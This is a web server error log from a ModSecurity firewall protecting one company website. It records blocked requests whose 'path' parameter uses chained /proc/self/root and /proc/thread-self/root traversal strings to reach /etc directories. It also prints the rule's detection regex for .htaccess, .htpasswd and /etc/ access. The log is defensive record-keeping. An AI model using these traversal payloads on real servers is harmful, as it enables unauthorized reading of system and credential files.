[Mon Mar 16 08:34:26.371081 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.241.46:43102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfqwnjZBu2q05ozVU87CwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:34:47.967433 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.241.46:43114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfq13jZBu2q05ozVU87JgAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:34:49.299374 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:41774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfq2dSswJuvopo3lOhGMgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:34:57.656871 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:41776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfq4Zqj1wV0Si-OkefOjwAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:35:19.980699 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.228.16:39694] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfq93jZBu2q05ozVU87KAAAAUc"]
[Mon Mar 16 08:35:25.522562 2026] [:error] [pid 10709:tid 140411741927168] [client 74.7.243.203:55174] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfq_RXjF1vJNtV6CWrgSgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:35:37.588366 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:47766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfrCZqj1wV0Si-OkefOogAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:35:49.169691 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:58240] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfrFbysWC90G-1nBrAsOAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:36:00.171165 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.243.203:56150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfrIHbQATo66fKoS7wxSQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:37:31.799187 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:57738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfre5qj1wV0Si-OkefPHwAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:37:54.651339 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.244.31:39700] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfrkpqj1wV0Si-OkefPLgAAAAE"]
[Mon Mar 16 08:38:20.903294 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:52536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfrrI6lpbStxTqkSktTMwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:38:35.263199 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.243.203:45982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfruxXjF1vJNtV6CWrgeAAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:38:55.559249 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:40580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfrz7ysWC90G-1nBrAsbgAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:38:57.983561 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:33066] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfr0Zqj1wV0Si-OkefPfwAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:38:59.295460 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:33072] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfr05qj1wV0Si-OkefPggAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:39:40.101644 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:46574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfr_AlT9VtDQc7bgUyPWgAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:40:20.799381 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.228.16:57294] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfsJHjZBu2q05ozVU87mgAAAVE"]
[Mon Mar 16 08:41:11.828623 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:58246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfsV3jZBu2q05ozVU870wAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 08:41:30.023941 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:49580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfsanbQATo66fKoS7wyAQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:41:32.377869 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:38092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfsbLABkC4fWIHEf8HSegAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:42:45.339598 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:38098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfstbABkC4fWIHEf8HSyAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:42:45.415639 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.241.46:36884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfstY6lpbStxTqkSktUKAAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:42:49.026906 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.241.46:43892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfsuXbQATo66fKoS7wyGAAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:43:24.013266 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.243.203:56236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfs3AlT9VtDQc7bgUyPwwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
